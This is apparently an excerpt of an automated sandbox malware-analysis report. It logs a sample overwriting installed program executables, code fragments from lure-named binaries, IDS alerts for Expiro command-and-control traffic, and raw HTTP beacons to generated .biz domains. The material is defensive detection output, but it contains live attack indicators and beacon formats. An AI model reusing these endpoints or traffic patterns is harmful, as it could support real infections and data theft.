                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                          Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 4x nop then jmp 07AC2ED9h0_2_07AC3155
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 4x nop then jmp 09432161h10_2_094323DD
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B77394h17_2_02B77187
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 02B778DCh17_2_02B77687
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_02B77E60
                          Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_02B77E5F
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02455782h19_2_02455358
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 024551B9h19_2_02454F08
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 02455782h19_2_024556AF
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9F028h19_2_04B9ED80
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B91935h19_2_04B915F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B90741h19_2_04B90498
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9BF28h19_2_04B9BC80
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9E778h19_2_04B9E4D0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9DEC8h19_2_04B9DC20
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B93EF8h19_2_04B93C50
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9D088h19_2_04B9CDE0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9C7D8h19_2_04B9C530
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B90FF1h19_2_04B90D48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9D93Ah19_2_04B9D690
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9A970h19_2_04B9A6C8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9F8D8h19_2_04B9F630
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9A0C0h19_2_04B99E18
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B93AA0h19_2_04B937F8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9B220h19_2_04B9AF78
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B931F0h19_2_04B92F48
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B94350h19_2_04B940A8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B90B99h19_2_04B908F0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9C380h19_2_04B9C0D8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9BAD0h19_2_04B9B828
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9E320h19_2_04B9E078
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B902E9h19_2_04B90040
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B91449h19_2_04B911A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9CC30h19_2_04B9C988
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9F480h19_2_04B9F1D8
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9EBD0h19_2_04B9E928
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9FD30h19_2_04B9FA88
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B92D98h19_2_04B92AF0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9D4E0h19_2_04B9D238
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9A518h19_2_04B9A270
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B93648h19_2_04B933A0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9B678h19_2_04B9B3D0
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeCode function: 4x nop then jmp 04B9ADC8h19_2_04B9AB20
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 4x nop then jmp 0645BCBDh35_2_0645BA40

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49757 -> 72.52.178.23:80
                          Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:63397 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:51179 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:57418 -> 1.1.1.1:53
                          Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49938 -> 54.244.188.177:80
                          Source: unknownNetwork traffic detected: DNS query count 34
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                          Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                          Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49745
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49745
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49742
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49742
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49739
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49739
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49800
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49789
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49800
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49789
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49841
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49841
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.227.7.138:80 -> 192.168.2.4:49847
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.227.7.138:80 -> 192.168.2.4:49847
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49883
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49883
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49891
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49891
                          Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.4:49927
                          Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.4:49927
                          Source: global trafficHTTP traffic detected: POST /haobwbcukjixe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                          Source: global trafficHTTP traffic detected: POST /mshapsve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /mmfoish HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /oxojrkg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /bufnddtl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /xpqdcslnor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: GET /xpqdcslnor?usid=27&utid=10221865676 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                          Source: global trafficHTTP traffic detected: POST /ewl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: GET /ewl?usid=27&utid=10221865931 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                          Source: global trafficHTTP traffic detected: POST /tnupafomghuok HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /yrkakyyuj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: POST /yos HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
                          Source: global trafficHTTP traffic detected: POST /snkwxvqngv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
                          Source: global trafficHTTP traffic detected: POST /wthge HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
                          Source: global trafficHTTP traffic detected: POST /tloalmkxssnuris HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
                          Source: global trafficHTTP traffic detected: POST /ehlglgm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 812
                          Source: global trafficHTTP traffic detected: POST /htmlawrabimntg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /mxuujpbjwek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /ms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /ld HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /kcogybxqholgdpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /k HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /we HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: GET /m?usid=27&utid=10221880067 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                          Source: global trafficHTTP traffic detected: POST /mt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: GET /mt?usid=27&utid=10221880299 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                          Source: global trafficHTTP traffic detected: POST /bilswy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /nrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /lgyfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /mblybww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                          Source: global trafficHTTP traffic detected: POST /rbdfcj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
